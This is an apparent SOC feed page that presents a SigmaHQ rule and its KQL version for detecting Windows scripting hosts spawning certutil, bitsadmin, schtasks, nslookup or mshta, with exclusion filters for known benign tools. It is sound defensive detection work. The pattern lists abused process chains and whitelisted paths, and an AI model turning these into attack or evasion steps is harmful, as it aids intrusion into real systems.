← Back to SOC feed Coverage →

Windows Shell/Scripting Processes Spawning Suspicious Programs

sigma HIGH SigmaHQ
T1059.005T1059.001T1218
imProcessCreate
powershell
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
View original rule at SigmaHQ →
Retrieved: 2026-05-22T11:00:00Z · Confidence: medium

Hunt Hypothesis

Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta…etc.

Detection Rule

Sigma (Original)

title: Windows Shell/Scripting Processes Spawning Suspicious Programs
id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde
status: test
description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
references:
    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2018-04-06
modified: 2023-05-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.005
    - attack.t1059.001
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            # - '\cmd.exe'  # too many false positives
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
            - '\wmiprvse.exe'
            - '\regsvr32.exe'
        Image|endswith:
            - '\schtasks.exe'
            - '\nslookup.exe'
            - '\certutil.exe'
            - '\bitsadmin.exe'
            - '\mshta.exe'
    filter_ccmcache:
        CurrentDirectory|contains: '\ccmcache\'
    filter_amazon:
        ParentCommandLine|contains:
            # FP - Amazon Workspaces
            - '\Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1'
            - '\Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1'
            - '\Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1'
            - '\nessus_' # Tenable/Nessus VA Scanner
    filter_nessus:
        CommandLine|contains: '\nessus_' # Tenable/Nessus VA Scanner
    filter_sccm_install:
        ParentImage|endswith: '\mshta.exe'
        Image|endswith: '\mshta.exe'
        ParentCommandLine|contains|all:
            - 'C:\MEM_Configmgr_'
            - '\splash.hta'
            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
        CommandLine|contains|all:
            - 'C:\MEM_Configmgr_'
            - '\SMSSETUP\BIN\'
            - '\autorun.hta'
            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
    condition: selection and not 1 of filter_*
falsepositives:
    - Administrative scripts
    - Microsoft SCCM
level: high

KQL (Azure Sentinel)

imProcessCreate
| where (((ParentProcessName endswith "\\mshta.exe" or ParentProcessName endswith "\\powershell.exe" or ParentProcessName endswith "\\pwsh.exe" or ParentProcessName endswith "\\rundll32.exe" or ParentProcessName endswith "\\cscript.exe" or ParentProcessName endswith "\\wscript.exe" or ParentProcessName endswith "\\wmiprvse.exe" or ParentProcessName endswith "\\regsvr32.exe") or (ActingProcessName endswith "\\mshta.exe" or ActingProcessName endswith "\\powershell.exe" or ActingProcessName endswith "\\pwsh.exe" or ActingProcessName endswith "\\rundll32.exe" or ActingProcessName endswith "\\cscript.exe" or ActingProcessName endswith "\\wscript.exe" or ActingProcessName endswith "\\wmiprvse.exe" or ActingProcessName endswith "\\regsvr32.exe")) and (TargetProcessName endswith "\\schtasks.exe" or TargetProcessName endswith "\\nslookup.exe" or TargetProcessName endswith "\\certutil.exe" or TargetProcessName endswith "\\bitsadmin.exe" or TargetProcessName endswith "\\mshta.exe")) and (not((TargetProcessCurrentDirectory contains "\\ccmcache\\" or (ActingProcessCommandLine contains "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1" or ActingProcessCommandLine contains "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\set-selfhealing.ps1" or ActingProcessCommandLine contains "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\check-workspacehealth.ps1" or ActingProcessCommandLine contains "\\nessus_") or TargetProcessCommandLine contains "\\nessus_" or ((ParentProcessName endswith "\\mshta.exe" or ActingProcessName endswith "\\mshta.exe") and TargetProcessName endswith "\\mshta.exe" and (ActingProcessCommandLine contains "C:\\MEM_Configmgr_" and ActingProcessCommandLine contains "\\splash.hta" and ActingProcessCommandLine contains "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}") and (TargetProcessCommandLine contains "C:\\MEM_Configmgr_" and TargetProcessCommandLine contains "\\SMSSETUP\\BIN\\" and TargetProcessCommandLine contains "\\autorun.hta" and TargetProcessCommandLine contains "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}")))))

Required Data Sources

Sentinel TableNotes
imProcessCreateEnsure this data connector is enabled

False Positive Guidance

MITRE ATT&CK Context

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml